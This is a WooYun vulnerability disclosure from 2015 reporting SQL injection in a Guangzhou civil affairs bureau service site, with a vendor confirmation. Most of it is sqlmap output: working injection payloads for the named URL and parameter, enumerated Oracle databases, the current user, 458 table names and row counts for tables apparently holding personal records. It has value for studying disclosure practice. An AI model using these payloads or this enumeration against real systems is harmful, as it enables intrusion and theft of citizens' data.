当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0125187

漏洞标题:广州市民政局某分站一处sql注入漏洞

相关厂商:广东省信息安全测评中心

漏洞作者: JiuShao

提交时间:2015-07-13 08:02

修复时间:2015-08-29 11:38

公开时间:2015-08-29 11:38

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(广东省信息安全测评中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-13: 细节已通知厂商并且等待厂商处理中
2015-07-15: 厂商已经确认,细节仅向厂商公开
2015-07-25: 细节向核心白帽子及相关领域专家公开
2015-08-04: 细节向普通白帽子公开
2015-08-14: 细节向实习白帽子公开
2015-08-29: 细节向公众公开

简要描述:

民政局,好多业务的,四百多个表。

详细说明:

广州市民政局一处sql注入漏洞
http://wsbs.gzmz.gov.cn/gsmpro/web/wbdt/bszn.jsp?service_id=2666

漏洞证明:

sqlmap identified the following injection points with a total of 123 HTTP(s) requests:
---
Place: GET
Parameter: service_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: service_id=2666' AND 1283=1283 AND 'bYVT'='bYVT
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: service_id=2666' AND 9020=DBMS_PIPE.RECEIVE_MESSAGE(CHR(78)||CHR(113)||CHR(70)||CHR(98),5) AND 'tRzz'='tRzz
---
web application technology: JSP
back-end DBMS: Oracle
available databases [19]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] FCCMS
[*] GSMPROMZJ
[*] LRY
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WB_USER
[*] WMSYS
[*] XDB
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: service_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: service_id=2666' AND 1283=1283 AND 'bYVT'='bYVT
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: service_id=2666' AND 9020=DBMS_PIPE.RECEIVE_MESSAGE(CHR(78)||CHR(113)||CHR(70)||CHR(98),5) AND 'tRzz'='tRzz
---
web application technology: JSP
back-end DBMS: Oracle
current user: 'GSMPROMZJ'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: service_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: service_id=2666' AND 1283=1283 AND 'bYVT'='bYVT
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: service_id=2666' AND 9020=DBMS_PIPE.RECEIVE_MESSAGE(CHR(78)||CHR(113)||CHR(70)||CHR(98),5) AND 'tRzz'='tRzz
---
web application technology: JSP
back-end DBMS: Oracle
current schema (equivalent to database on Oracle): 'GSMPROMZJ'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: service_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: service_id=2666' AND 1283=1283 AND 'bYVT'='bYVT
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: service_id=2666' AND 9020=DBMS_PIPE.RECEIVE_MESSAGE(CHR(78)||CHR(113)||CHR(70)||CHR(98),5) AND 'tRzz'='tRzz
---
web application technology: JSP
back-endsqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: service_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: service_id=2666' AND 1283=1283 AND 'bYVT'='bYVT
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: service_id=2666' AND 9020=DBMS_PIPE.RECEIVE_MESSAGE(CHR(78)||CHR(113)||CHR(70)||CHR(98),5) AND 'tRzz'='tRzz
---
web application technology: JSP
back-end DBMS: Oracle
current schema (equivalent to database on Oracle): 'GSMPROMZJ'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: service_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: service_id=2666' AND 1283=1283 AND 'bYVT'='bYVT
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: service_id=2666' AND 9020=DBMS_PIPE.RECEIVE_MESSAGE(CHR(78)||CHR(113)||CHR(70)||CHR(98),5) AND 'tRzz'='tRzz
---
web application technology: JSP
back-end DBMS: Oracle
Database: GSMPROMZJ
[458 tables]
+--------------------------------+
| ASSOCIATION_3 |
| BAIDMAP_TYPE |
| BAIDUMAP_POINTER |
| BI_APP_TREE |
| BI_CLASS |
| BI_CLASS_DETAIL |
| BI_DATAMAPDEPLOYLOG |
| BI_FORM_INFO |
| BI_FORM_VERSION |
| BI_LANGUAGE_SUPPORT |
| BI_LAYOUT_APP |
| BI_LAYOUT_PERSONAL |
| BI_MENU |
| BI_MODEL_TIME_CONF |
| BI_PARAM_INFO |
| BI_PARAM_TYPE_INFO |
| BI_PARAM_TYPE_PERSONAL_DESC |
| BI_PERSONAL_INFO |
| BI_REPORT_INFO |
| BI_REPORT_VERSION |
| BI_SAPP_INFO |
| BI_SAPP_PARAM |
| BI_TRAN_INFO |
| BI_WFV_FORMINFO |
| BI_WORKFLOW_INFO |
| BI_WORKFLOW_MONITOR |
| BI_WORKFLOW_VERSION |
| CMS_ALERT_WORD |
| CMS_APP_NOTICE |
| CMS_CATEGORY |
| CMS_CATE_REL |
| CMS_EXPPROPERTIES |
| CMS_HOTWORD |
| CMS_INFORMATION |
| CMS_INFORMATION_DATASTAGE |
| CMS_INFORMATION_OLD |
| CMS_INFO_ACCESS |
| CMS_INFO_BRANCH |
| CMS_INFO_CATE_REL |
| CMS_INFO_SITE_REL |
| CMS_NOTICE |
| CMS_PAGE_CATES_REL |
| CMS_SHARECATEGORY |
| CMS_SITE |
| CMS_SOURCES |
| CMS_SOURCETYPE |
| CMS_SOURCEURL |
| CMS_STATUS |
| CMS_TEMPLATE |
| CMS_TEMPLATERELATIONSHIP |
| CMS_TEMPLATEREL_EXT |
| CMS_TEMPLATESHARE |
| CMS_TEMPLATETYPE |
| CMS_TEMP_CATES_REL |
| CMS_TEMP_CATES_REL_EXT |
| CMS_WEBSERVER |
| CMS_WORKFLOW_SHARE |
| CSW_XMSQB |
| DMB_CSD |
| DMB_HKSZD |
| DMB_MZ |
| DMB_SQRGX |
| DMB_SSPCS |
| DMB_ZW |
| EX_SHEBAOKA_31_WSSQXX |
| EX_SHEBAOKA_32_SLXX |
| EX_SHEBAOKA_33_BJXX |
| EX_WANGBAN_DATACHANGE |
| FC |
| FILEMNG_INFO |
| FORM_ASDDW |
| FORM_BRJL |
| FORM_BZSP |
| FORM_CBBSSB |
| FORM_CRJ_AMSQ |
| FORM_CRJ_CHINASQ |
| FORM_CRJ_HQDJ |
| FORM_CRJ_HZQF |
| FORM_CRJ_NLGASQ |
| FORM_CRJ_TWJMDJ |
| FORM_CRJ_TWLDL |
| FORM_CRJ_WLTW |
| FORM_CRJ_XGSQ |
| FORM_CSSB |
| FORM_CYQK |
| FORM_DD |
| FORM_DFJCCS |
| FORM_DLSQ |
| FORM_DMBG |
| FORM_DMXM |
| FORM_DSDW |
| FORM_DSFE |
| FORM_DSHCY |
| FORM_DTSP |
| FORM_DWER |
| FORM_DWFW |
| FORM_FGMZX |
| FORM_FJYW |
| FORM_GLJSRYMD |
| FORM_GLJSRYMDHZ |
| FORM_GLJSRYMDSJ |
| FORM_GMJS |
| FORM_GMSP |
| FORM_GRTYB |
| FORM_GUHY |
| FORM_GXBSSQ |
| FORM_GXGZHZ |
| FORM_GZRYB |
| FORM_HFPZSYQMXB |
| FORM_HSBADJ |
| FORM_HZ_BJTXZ |
| FORM_HZ_SNQZYS |
| FORM_JF_CPNJ |
| FORM_JF_CPSCHZ |
| FORM_JF_CPSCSQ |
| FORM_JF_GCSB |
| FORM_JF_GCYSSQ |
| FORM_JF_ZGZBG |
| FORM_JF_ZGZHZ |
| FORM_JF_ZGZSJ |
| FORM_JF_ZGZSQ |
| FORM_JJ_GLTX |
| FORM_JSGM |
| FORM_JZWSQ |
| FORM_KSZY |
| FORM_LDRYMD |
| FORM_LNR_YDZHF |
| FORM_LSSPHJ |
| FORM_NB_JRSP |
| FORM_PZSYQMXB |
| FORM_QSHDSQ |
| FORM_QYTYB |
| FORM_RYMD |
| FORM_SFWE |
| FORM_SPHJSQ |
| FORM_SSFJ_CBHP |
| FORM_SSFJ_CHCB |
| FORM_SSFJ_LDRY |
| FORM_SSSX |
| FORM_TEST |
| FORM_TEST_A |
| FORM_TEST_ABC |
| FORM_TXSQXXB |
| FORM_TYB |
| FORM_WCJYBA |
| FORM_WFJG |
| FORM_WJDSBA |
| FORM_WJDSHDJ |
| FORM_WJRDJ |
| FORM_WJXZDJ |
| FORM_WJZNXZBA |
| FORM_WJZVSQ |
| FORM_WZKBSQ |
| FORM_XZFY_DWSQ |
| FORM_XZFY_DWWT |
| FORM_XZFY_GRSQ |
| FORM_XZFY_GRWTSQ |
| FORM_YQMXB |
| FORM_YQMXBHZ |
| FORM_YQMXBSJ |
| FORM_YSXMHZ |
| FORM_YSXMSJ |
| FORM_YTYWSP |
| FORM_ZA_BODW |
| FORM_ZA_BPRY |
| FORM_ZA_BPSP |
| FORM_ZA_DXHDSQ |
| FORM_ZA_MYCQSQ |
| FORM_ZA_QZPGSP |
| FORM_ZA_TZHYXK |
| FORM_ZA_YYSJ |
| FORM_ZB |
| FORM_ZBC |
| FORM_ZDY |
| FORM_ZFJG |
| FORM_ZFZGSQ |
| FORM_ZGRD |
| FORM_ZKKBSQ |
| FORM_ZRST |
| GECS_ADDRESSLIST |
| GECS_ADDRESSLISTDETAIL |
| GECS_BBS_BULLETIN |
| GECS_BBS_CHANNEL |
| GECS_BBS_ONLINE |
| GECS_BBS_POST |
| GECS_BBS_USER |
| GECS_CONSULT |
| GECS_DISPONSECONSULT |
| GECS_FILEJOIN |
| GECS_INTERACTIVE |
| GECS_ORGNIZEMANAGE |
| GECS_QUESTIONNAIRE |
| GECS_QUESTIONNAIRE_ITEMS |
| GECS_QUESTIONNAIRE_RESULT |
| GECS_QUESTIONNAIRE_SUBJECT |
| GECS_RECORDFILE |
| GECS_SUBORGNIZEMANAGE |
| GECS_TYPECONSULT |
| GECS_TYPEFILE |
| GECS_TYPEJOIN |
| GECS_TYPEORGNIZEMANAGE |
| GZCS_CCXXGK |
| GZCS_CCXXGK_B |
| GZCS_CONSULTING_TABLE |
| GZCS_CZBM |
| GZCS_DONATE_MONEY_RECORD |
| GZCS_FUNDRAISER_PROJECT |
| GZCS_FUNDRAISER_PROJECT1 |
| GZCS_FUNDRAISER_PROJECT_B |
| GZCS_FUNDRAISER_PROJECT_REL |
| GZCS_FUNDRAISER_PROJECT_REL_B |
| GZCS_FUNDRAISER_PROJECT_UP |
| GZCS_FUNDRAISER_PROJECT_XKZ |
| GZCS_FUNDRAISER_PROJECT_XKZ_B |
| GZCS_GYSL |
| GZCS_GYYS |
| GZCS_LOVESTORY |
| GZCS_NEEDHELP_FAMILY_TABLE |
| GZCS_NEEDHELP_TABLE |
| GZCS_REG_USER |
| GZCS_SENDHISTORY |
| GZCS_SUPORT_TABLE |
| GZCS_TJH |
| GZCS_TJXMSB |
| GZCS_TOHELP_TABLE |
| GZCS_YQSQ |
| GZCS_ZNX |
| ID_TABLE |
| IM_ITEM_VIEW_M |
| JCSD |
| LOG_INFORMATION |
| LOG_LOGIN |
| LOG_OPERATION |
| LSH_B |
| MSG_ATTACHFILES |
| MSG_MESSAGE |
| MSG_ONLINE_INFO |
| MSG_PERSONAL |
| MSG_PERSONALSETTING |
| MSG_RECEIVER |
| MSG_ROUTE |
| OBJECT_ACCESS_COUNT |
| OS_CURRENTSTEP |
| OS_CURRENTSTEP_PREV |
| OS_HISTORYSTEP |
| OS_HISTORYSTEP_PREV |
| OS_PROPERTYENTRY |
| OS_WFENTRY |
| OS_WORKFLOWDEFS |
| QRTZ_BLOB_TRIGGERS |
| QRTZ_CALENDARS |
| QRTZ_CRON_TRIGGERS |
| QRTZ_FIRED_TRIGGERS |
| QRTZ_JOB_DETAILS |
| QRTZ_JOB_LISTENERS |
| QRTZ_LOCKS |
| QRTZ_PAUSED_TRIGGER_GRPS |
| QRTZ_SCHEDULER_STATE |
| QRTZ_SIMPLE_TRIGGERS |
| QRTZ_TRIGGERS |
| QRTZ_TRIGGER_LISTENERS |
| SB_LSH_B |
| SB_TB_CONNNET |
| SB_TB_FILE |
| SB_TB_IMAGE |
| SB_TB_SPLOG |
| SB_TB_XXJL |
| SECURITY_ACL |
| SECURITY_ACTION |
| SECURITY_EXCEPTIVEACL |
| SECURITY_MENUURLS |
| SECURITY_RESOURCE |
| SECURITY_RESOURCETYPE |
| SPECIALDAY |
| SYSTEM_PERSONAL_INFO |
| TB_ALARM |
| TB_ALARM_EMAIL |
| TB_ALARM_EMAIL_LOG |
| TB_ALARM_EMAIL_TEMP |
| TB_ALARM_TEMP |
| TB_ALERT |
| TB_CODENUMBER |
| TB_CSMJ |
| TB_DATASOURCE |
| TB_DATASTAGE |
| TB_DATASTAGE_TASK |
| TB_DATASTAGE_TIMETASK |
| TB_EXCHANGE_GZ_BSJG |
| TB_EXCHANGE_GZ_JGFF |
| TB_EXCHANGE_GZ_WSTS |
| TB_EXCHANGE_GZ_WSZX |
| TB_EXCHANGE_GZ_YWSQ |
| TB_GSM_OPERATO_LOG |
| TB_HOTKEYWORD |
| TB_LRY_WIANTING_TS |
| TB_OLSH_APPLY |
| TB_OLSH_COMPLAINT |
| TB_OLSH_CONSULTATION |
| TB_OLSH_CONSULTATION_HISTORY |
| TB_OLSH_CONSULTION_TO_USER |
| TB_OLSH_HEADPHOTO |
| TB_OLSH_REGISTER_ENTUSER |
| TB_OLSH_REGISTER_PERUSER |
| TB_OLSH_REGISTER_USER |
| TB_OLSH_RESOURCE |
| TB_OLSH_SERVICE_CLAUSE |
| TB_OLSH_SYSTEMLOG |
| TB_OLSH_USER_CARD |
| TB_OLSH_USER_FOCUSSERVICE |
| TB_OLSH_USER_TOCONSULTATION |
| TB_OLSH_USER_TOHEAD |
| TB_STAGE |
| TB_SYSTEM_CUSTOMIZATION |
| TB_SYSTEM_CUSTOMIZATION_OPER |
| TB_TABLES |
| TB_WORKDAY |
| TB_WSMP_APPROVAL |
| TB_WSMP_APPROVAL_ACCEPT |
| TB_WSMP_APPROVAL_REPACCEPT |
| TB_WSMP_APPROVAL_SPECIALPRGRM_ |
| TB_WSMP_APPROVAL_SUPPLEMENT |
| TB_WSMP_AUTOAPPROVAL |
| TB_WSMP_CATEGORY |
| TB_WSMP_CATEGORY_SERVICE |
| TB_WSMP_DATACHAGE_COLUMN |
| TB_WSMP_DATACHAGE_TABLE |
| TB_WSMP_DATAUPSERVICE |
| TB_WSMP_DATAUPSERVICE_DETAIL |
| TB_WSMP_DBSOURCE |
| TB_WSMP_FLOW |
| TB_WSMP_FLOW_LINK |
| TB_WSMP_FLOW_NODE |
| TB_WSMP_FLOW_PROCESS |
| TB_WSMP_FLOW_WAITTASK |
| TB_WSMP_MICROBLOG_SHARE |
| TB_WSMP_QUERYSERVICE |
| TB_WSMP_QUERYSERVICE_FILTERCON |
| TB_WSMP_QUERYSERVICE_INPUTCOND |
| TB_WSMP_QUERYSERVICE_RESULT |
| TB_WSMP_SERVICE |
| TB_WSMP_SERVICEITEM |
| TB_WSMP_SERVICEITEMFORM_VERIFY |
| TB_WSMP_SERVICEITEMID_QUOTA |
| TB_WSMP_SERVICEITEM_COMPROBLEM |
| TB_WSMP_SERVICEITEM_CONFIG |
| TB_WSMP_SERVICEITEM_DOCTOTEMPL |
| TB_WSMP_SERVICEITEM_FILE |
| TB_WSMP_SERVICEITEM_FORM |
| TB_WSMP_SERVICEITEM_FORMRESOUR |
| TB_WSMP_SERVICEITEM_FORMTORESO |
| TB_WSMP_SERVICEITEM_INFODOCTEM |
| TB_WSMP_SERVICEITEM_INTERFACE |
| TB_WSMP_SERVICEITEM_ITEM_TABLE |
| TB_WSMP_SERVICEITEM_MATLTORESO |
| TB_WSMP_SERVICEITEM_NOTICE |
| TB_WSMP_SERVICEITEM_NOTICTOTEM |
| TB_WSMP_SERVICEITEM_PRINT |
| TB_WSMP_SERVICEITEM_PUBCHECK |
| TB_WSMP_SERVICEITEM_QUOTA |
| TB_WSMP_SERVICEITEM_RELATION |
| TB_WSMP_SERVICEITEM_REPLY |
| TB_WSMP_SERVICEITEM_RESOURCE |
| TB_WSMP_SERVICEITEM_RESOURCE_ |
| TB_WSMP_SERVICEITEM_TOFLOW |
| TB_WSMP_SERVICEITEM_TONODE |
| TB_WSMP_SERVICEITEM_TOQUOTA |
| TB_WSMP_SERVICEITEM_TOTYPE |
| TB_WSMP_SERVICEITEM_VERIFY |
| TB_WSMP_SERVICEITEM_VERSION |
| TB_WSMP_SERVICEITEM_WEBRE |
| TB_WSMP_SERVICEITEM_WEBREPLY |
| TB_WSMP_SERVICEITEM_WORKFLOW |
| TB_WSMP_SERVICE_OLD |
| TB_WSMP_SERVICE_REALNAME |
| TB_WSMP_SERVICE_TO_TEMPLATE |
| TB_WSMP_SERVICE_TO_USER |
| TB_WSMP_SERVICE_USERCLAUSE |
| TB_WSMP_SYSTEMLOG |
| TB_WSMP_TASK_AGENT |
| TB_WSMP_UPDATASERVICE |
| TB_WSMP_UPDATASERVICE_DETAIL |
| TB_WSMP_UPDATASERVICE_FOR_USER |
| TB_WSMP_UPDATASERVICE_USER |
| TB_WSMP_USER_AUDIT |
| TB_WSMP_USER_HAVESERVICE |
| TB_WSMP_WEBSERVICES |
| TB_WSMP_WEB_MESSAGE |
| TB_WSMP_WEB_MESSAGE_ACCEPT |
| TB_WSMP_WEB_QUERYLOG |
| TMD_CAIWU |
| TMD_PROJECT |
| TMD_TOTAL |
| T_SYSTEM_CALENDAR_DAY |
| UFM_DETAILENTRY |
| UFM_MAINENTRY |
| UGO_AUDITINFO |
| UGO_DEPT_WORKFLOW_INFO |
| UGO_FORM_AUDIT_INFO |
| UGO_PROCESSRECORD |
| UGO_REQUEST |
| UGO_SYTEMCONFIG |
| UGO_WORKDAYEXCEPTION |
| UG_COMPANY |
| UG_ENTMEMBER |
| UG_ENTMEMBER_TMP |
| UG_EXT_ROLE_ORGTYPE_REL |
| UG_GROUP |
| UG_GROUPTOUSER |
| UG_INNERUSER |
| UG_MEMBER |
| UG_MEMBER_TMP |
| UG_ORG |
| UG_ORGTOORG |
| UG_PERSONMEMBER |
| UG_PERSONMEMBER_TMP |
| UG_USER |
| UG_USERTOUSER |
| UG_USERTYPE_REL |
| UTIL_SEQUENCE |
| UWF_APPDATAINFO |
| UWF_DATAINST |
| UWF_FUNCPARAMS |
| UWF_IDCARDINFO |
| UWF_INITACTION |
| UWF_NODEEXTINFO |
| UWF_OSWFDEF |
| UWF_OWNER |
| UWF_OWNERS |
| UWF_RESULTLOG |
| UWF_STEPEXECUTOR |
| UWF_STEPINST |
| UWF_STEPINST_PREV |
| UWF_SURROGATEDETAIL |
| UWF_SURROGATEINFO |
| UWF_WORKFLOWENTRY |
| UWF_WORKFUNC |
| UWF_WORKTASK |
| UWF_WORKTASKHISTORY |
| WEEKTIME |
| WF_ACTION |
| WF_CLASS |
| WF_GLOABLE_VARIABLE |
| WF_HISTORY_TASK |
| WF_INSTANCE_INFO |
| WF_MODEL_VERSION |
| WF_RESOURCE |
| WF_TASK |
| WF_TASK_EXEC_DETAIL |
| WF_TASK_TRANSFER |
| WF_TASK_TRANSFER_CONFIG |
| WF_WORKFLOW |
| WORKTIME |
| WSFW_WSSP_ACCEPTED |
| YYPEOPLE |
| YYPEOPLEOLD |
| YYPEOPLETEMP |
| YYPEOPLE_TEPLOG |
| ZWGK_FILE_INFO |
+--------------------------------+
Database: GSMPROMZJ
+--------------------------------+---------+
| Table | Entries |
+--------------------------------+---------+
| YYPEOPLEOLD | 220130 |
| YYPEOPLE | 45165 |
| BI_CLASS | 4066 |
| TMD_PROJECT | 1443 |
| TMD_CAIWU | 1327 |
| YYPEOPLE_TEPLOG | 1157 |
| UFM_MAINENTRY | 722 |
| WEEKTIME | 558 |
| UFM_DETAILENTRY | 557 |
| UG_GROUPTOUSER | 309 |
| BI_TRAN_INFO | 271 |
| DMB_ZW | 204 |
| UG_INNERUSER | 191 |
| UG_USER | 191 |
| UG_USERTYPE_REL | 191 |
| TMD_TOTAL | 162 |
| CMS_INFORMATION_OLD | 140 |
| BI_CLASS_DETAIL | 133 |
| CMS_CATEGORY | 123 |
| BI_MENU | 122 |
| UTIL_SEQUENCE | 83 |
| UG_GROUP | 78 |
| EX_WANGBAN_DATACHANGE | 75 |
| CMS_INFO_ACCESS | 67 |
| UG_ORG | 56 |
| BI_PARAM_INFO | 55 |
| CMS_INFORMATION | 49 |
| TB_WSMP_WEB_MESSAGE | 42 |
| TB_WSMP_WEB_MESSAGE_ACCEPT | 42 |
| UG_ORGTOORG | 42 |
| FORM_CBBSSB | 41 |
| CMS_EXPPROPERTIES | 40 |
| DMB_SQRGX | 39 |
| UWF_FUNCPARAMS | 29 |
| WORKTIME | 28 |
| FORM_HZ_BJTXZ | 25 |
| WF_ACTION | 21 |
| BI_FORM_INFO | 15 |
| BI_FORM_VERSION | 15 |
| BI_MODEL_TIME_CONF | 15 |
| UWF_NODEEXTINFO | 12 |
| UGO_FORM_AUDIT_INFO | 11 |
| WSFW_WSSP_ACCEPTED | 11 |
| BI_PARAM_TYPE_INFO | 10 |
| UGO_SYTEMCONFIG | 9 |
| WF_INSTANCE_INFO | 9 |
| WF_TASK | 9 |
| FC | 7 |
| FORM_JF_CPSCSQ | 7 |
| FORM_CRJ_AMSQ | 6 |
| WF_MODEL_VERSION | 6 |
| WF_WORKFLOW | 6 |
| YYPEOPLETEMP | 6 |
| UWF_WORKFUNC | 5 |
| FORM_CRJ_NLGASQ | 4 |
| SECURITY_EXCEPTIVEACL | 4 |
| TB_WSMP_SERVICEITEM_FORMTORESO | 4 |
| BI_DATAMAPDEPLOYLOG | 3 |
| FORM_GXBSSQ | 3 |
| FORM_JF_CPSCHZ | 3 |
| UWF_OWNERS | 3 |
| WF_CLASS | 3 |
| WF_RESOURCE | 3 |
| DMB_SSPCS | 2 |
| FILEMNG_INFO | 2 |
| FORM_GXGZHZ | 2 |
| BI_LANGUAGE_SUPPORT | 1 |
| BI_WORKFLOW_INFO | 1 |
| BI_WORKFLOW_VERSION | 1 |
| FORM_CRJ_CHINASQ | 1 |
| FORM_CSSB | 1 |
| FORM_DSHCY | 1 |
| FORM_GLJSRYMDHZ | 1 |
| FORM_JF_CPNJ | 1 |
| UWF_INITACTION | 1 |
| UWF_OSWFDEF | 1 |
+--------------------------------+---------+

修复方案:

权限虽然不是sa 但是还是数据能出来的
最近眼皮总跳,不深入了。

版权声明:转载请注明来源 JiuShao@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-07-15 11:36

厂商回复:

非常感谢您的报告。
报告中的问题已确认并复现.
影响的数据:高
攻击成本:低
造成影响:高
综合评级为:高,rank:10
正在联系相关网站管理单位处置。

最新状态:

暂无


漏洞评价:

评论